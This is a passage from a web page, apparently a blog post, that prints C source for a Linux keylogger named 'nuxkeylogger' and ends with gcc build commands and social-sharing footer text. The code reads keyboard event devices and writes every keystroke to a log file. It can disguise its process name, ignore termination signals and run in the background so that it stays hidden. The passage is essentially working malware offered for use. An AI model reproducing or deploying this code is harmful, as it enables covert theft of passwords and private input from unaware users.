      break;
    case 'i':
      name = argv[optind - 1];
      break;
    case 'd':
      daemonize ();
      break;
    case 's':
      block_signal ();
      break;
    case 'A':
      tab_key = (char **) tab_key_azerty;
      break;
    case 'Q':
      tab_key = (char **) tab_key_qwerty;
      break;
    case 'p':
      *pathlog = xstrdup (optarg);
      break;
    }
    }
  while (opt != -1);
  if (name)
    hide (argc, argv, name);
}

void
version (void)
{
  puts (VERSION_STR);
  exit (EXIT_SUCCESS);
}

void
usage (void)
{
  printf ("Warning, in \"qwerty\" mode, it's possibility to error key-mapp\n"
      "arguments list:\n\r"
      "   -H, --help                  print usage and exit program\n\r"
      "   -V, --version               print program_version and exit\r\n"
      "   -d, --daemonize             exec program in background\r\n"
      "   -s, --block-signal          block all signal\r\n"
      "   -Q, --mode-qwerty           keyboard in qwerty mode\r\n"
      "   -A, --mode-azerty           keyboard in azerty mode"
      "(by default)\r\n"
      "   -i, --hidden [NEW NAME]     change program name\r\n"
      "   -p, --path-log [PATH]       name for output log file\r\n");
  exit (EXIT_SUCCESS);
}

void
out_memory (const char *type)
{
  fprintf (stderr, "%s: memory exhausted\n", type);
  exit (EXIT_FAILURE);
}

char *
xstrdup (const char *str)
{
  char *copy = NULL;

  copy = strdup (str);
  if (!copy)
    out_memory ("strdup");
  return copy;
}
   
void
hide (int argc, char **argv, const char *name)
{
  char  *newname = NULL;

  newname = xstrdup (name);
  for (; argc; argc--)
    memset (argv[argc - 1], 0, strlen (argv[argc - 1]));
  strcpy (argv[0], newname);
  free (newname);
}

void
block_signal (void)
{
  int *p_sig = NULL;
  static const int sigtab[] =
    {
      SIGUSR1, SIGUSR2, SIGINT, SIGPIPE, SIGQUIT,
      SIGTERM, SIGTSTP, SIGHUP, SIGILL, SIGABRT,
      SIGFPE, SIGSEGV, SIGALRM, SIGCHLD, SIGCONT,
      SIGTTIN, SIGTTOU, 0
    };
 
  p_sig = (int *) sigtab;
  do
    signal (*p_sig, SIG_IGN);
  while (*++p_sig);
}

void
daemonize (void)
{
  pid_t pid;

  pid = fork ();
  if (pid == -1)
    {
      perror ("fork");
      exit (EXIT_FAILURE);
    }
  else if (pid)
    exit (EXIT_SUCCESS);
}

int
get_keyboard_fd (struct fdlist_s *fl)
{
  struct dirent *ent = NULL;
  DIR *dir = NULL;
  char path[PATH_LEN];

  dir = opendir (PATH_KEYBOARD_FILE);
  if (!dir)
    {
      fprintf (stderr, "opendir: %s\n", strerror (errno));
      return -1;
    }
  for (;;)
    {
      ent = readdir (dir);
      if (!ent)
    break;
      if (strstr(ent->d_name, "-kbd"))
    {
      memset (path, 0, PATH_LEN);
      snprintf (path, (PATH_LEN - 1), "%s%s",
            PATH_KEYBOARD_FILE, ent->d_name);
      fl->n++;
      fl->fdtab = realloc (fl->fdtab, (fl->n * sizeof (int)));
      fl->fdtab[fl->n - 1] = open (path, O_RDONLY);
      if (fl->fdtab[fl->n - 1] == -1)
        {
          fprintf (stderr, "open(%s): %s", path, strerror (errno));
          closedir (dir);
          return -1;
        }
    }
    }
  closedir (dir);
  fl->p_lastfd = &fl->fdtab[fl->n - 1];
  return 0;
}

int
open_fd_log (char *pathlog, int *fd)
{
  char *p_log = NULL;

  p_log = (pathlog) ? pathlog : DF_PATH_LOG;
  *fd = open (p_log, O_WRONLY | O_CREAT | O_APPEND);
  if (*fd == -1)
    fprintf (stderr, "open(%s): %s\n", p_log, strerror (errno));
  if (pathlog)
    free (pathlog);
  return *fd;
}

void
free_fdlist (struct fdlist_s *fl)
{
  int i;

  if (fl->fdtab)
    {
      for (i = 0; i < fl->n; i++)
    {
      if (fl->fdtab[i] != -1)
        close (fl->fdtab[i]);
    }
      free (fl->fdtab);
    }
  if (fl->fdlog != -1)
    close (fl->fdlog);
}

void
loop_keyboard_key (struct fdlist_s *fl)
{
  int n;
  int ret;
  fd_set setread;

  for (;;)
    {
      FD_ZERO (&setread);
      for (n = 0; n < fl->n; n++)
    FD_SET (fl->fdtab[n], &setread);
      ret = select (*fl->p_lastfd + 1, &setread, NULL, NULL, NULL);
      if (ret == -1)
    return;
      else if (ret)
    {
      for (n = 0; n < fl->n; n++)
        if (FD_ISSET (fl->fdtab[n], &setread))
          {
        if (write_key (fl->fdtab[n], fl->fdlog) == -1)
          return;
          }
    }
    }
}

int
write_key (int fd, int fdlog)
{
  struct input_event ev;
  char *key = NULL;

  if (read(fd, &ev, sizeof(struct input_event))
      == sizeof(struct input_event))
    {
      if ((ev.value == EV_KEY || ev.value == 2)
      && (ev.code - 1) > -1 && (ev.code - 1) < 118)
    {
      key = tab_key[ev.code - 1];
      if (write (fdlog, key, strlen (key)) == -1)
        return -1;
    }
    }
  return 0;
}

For Installation:- 

$ gcc -o nuxkeylogger nuxkeylogger.c -W -Wall 
# ./nuxkeylogger --help

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...

Site search